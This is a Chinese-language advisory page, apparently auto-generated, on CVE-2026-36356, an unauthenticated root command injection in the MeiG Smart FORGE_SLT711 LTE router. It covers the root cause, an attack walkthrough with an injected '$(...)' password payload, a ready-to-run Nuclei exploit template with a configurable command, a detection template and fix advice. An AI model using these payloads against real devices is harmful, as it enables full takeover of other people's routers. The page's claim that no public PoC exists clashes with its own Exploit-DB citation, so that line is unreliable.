[hardware] MeiG Smart FORGE_SLT711 - OS Command Injection
CVE-2026-36356 是MeiG Smart FORGE_SLT711 4G LTE CPE设备中GoAhead Web服务器的一个严重OS命令注入漏洞。未经身份验证的攻击者可通过向/action/SetRemoteAccessCfg发送含有恶意payload的JSON请求,以root权限执行任意系统命令。该漏洞影响所有固件版本,可导致设备完全被控。本文提供深度分析、PoC原理、攻击场景及修复建议。
MeiG Smart FORGE_SLT711 GoAhead Web服务器未授权OS命令注入漏洞。
Critical · CVSS CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8)📋 漏洞基础信息
| CVE | CVE-2026-36356 |
|---|---|
| 漏洞类型 | OS命令注入 |
| 受影响版本 | MeiG Smart FORGE_SLT711 (Ortel 4G LTE CPE) 固件版本 MDM9607.LE.1.0-00110-STD.PROD-1 及该产品线所有固件版本 |
| 危害等级 | Critical · CVSS CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8) |
| 发布日期 | 2026-05-27 |
| 提交者 | Daniil Gordeev |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
GoAhead Web服务器在处理/action/SetRemoteAccessCfg端点时,将JSON请求中的password字段直接通过sprintf拼接进命令字符串"echo root:\"%s\"|chpasswd",并调用system()执行,且该端点未包含在路由认证列表中,允许未经身份验证的攻击者注入任意系统命令。
🎯 攻击场景
1. 攻击者确定目标MeiG FORGE_SLT711设备的IP地址(如192.168.1.1); 2. 构造一个包含恶意命令的JSON负载,如{"password": "$(id > /tmp/out)"}; 3. 向http://<target_ip>:80/action/SetRemoteAccessCfg发送POST请求,Content-Type为application/json; 4. 服务器将password值拼接到命令中并以root权限执行,攻击者命令成功执行(盲注,输出需重定向到文件); 5. 若响应中retcode为0则表示命令成功执行。
💥 漏洞影响
未经身份验证的远程攻击者可以root权限在设备上执行任意系统命令,导致完全控制设备、数据泄露、植入后门、横向移动等严重危害。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-36356-exploit
info:
name: MeiG Smart FORGE_SLT711 - OS Command Injection Exploit
author: dgordeev
severity: critical
description: |
Unauthenticated OS command injection in MeiG Smart FORGE_SLT711 via /action/SetRemoteAccessCfg.
The "password" field is passed to sprintf("echo root:\"%s\"|chpasswd") then system().
Commands execute as root. This exploit sends a command and verifies execution by checking
the retcode field in the JSON response.
reference:
- https://www.exploit-db.com/exploits/52053
tags: cve,cve2026,rce,meig,iot
variables:
cmd: "id"
http:
- method: POST
path:
- "{{BaseURL}}/action/SetRemoteAccessCfg"
headers:
Content-Type: application/json
body:
'{"password":"$({{cmd}})"}'
matchers:
- type: word
words:
- '{"retcode":0}'
condition: and
- type: status
status:
- 200🔬 深度技术分析
PoC脚本使用argparse接收目标IP、端口和要执行的命令;构造JSON负载{"password": "$({cmd})"},利用shell命令替换语法将用户命令嵌入password字段;通过urllib发送POST请求到/action/SetRemoteAccessCfg端点;服务器sprintf拼接字符串后调用system()执行,命令以root权限运行;由于命令输出不返回HTTP响应,PoC提示使用--cmd "cmd > /tmp/out"重定向输出到文件进行盲注。
🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-36356-detection
info:
name: MeiG Smart FORGE_SLT711 - OS Command Injection Detection
author: dgordeev
severity: critical
description: |
MeiG Smart FORGE_SLT711 (Ortel 4G LTE CPE) is vulnerable to unauthenticated OS command injection
via the /action/SetRemoteAccessCfg endpoint. The "password" field in JSON payload is passed directly
to system() call, allowing remote code execution as root.
reference:
- https://www.exploit-db.com/exploits/52053
tags: cve,cve2026,rce,meig,iot
http:
- method: POST
path:
- "{{BaseURL}}/action/SetRemoteAccessCfg"
headers:
Content-Type: application/json
body: '{"password":"$(echo vulnerable_test)"}'
matchers:
- type: word
words:
- '{"retcode":0}'
condition: and
- type: status
status:
- 200
extractors:
- type: json
part: body
json:
- .retcode🛡️ 修复建议
厂商应发布固件更新,在/action/SetRemoteAccessCfg端点实施身份认证,并对password字段进行严格输入验证或改用安全函数替代sprintf/system调用;临时缓解措施包括限制对该端点的网络访问、使用WAF阻止异常payload模式。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-29 08:08 | 来源: Exploit-DB
🤖 常见问题解答(FAQ)
❓ 漏洞是否需要认证?
不需要,/action/SetRemoteAccessCfg端点未在GoAhead路由认证列表中,可直接未授权访问。
❓ 命令执行是否有回显?
无回显,是盲注方式,需将命令输出重定向到文件,如"id > /tmp/out"。
❓ 影响哪些设备?
MeiG FORGE_SLT711(Ortel 4G LTE CPE)以及该产品线所有固件版本。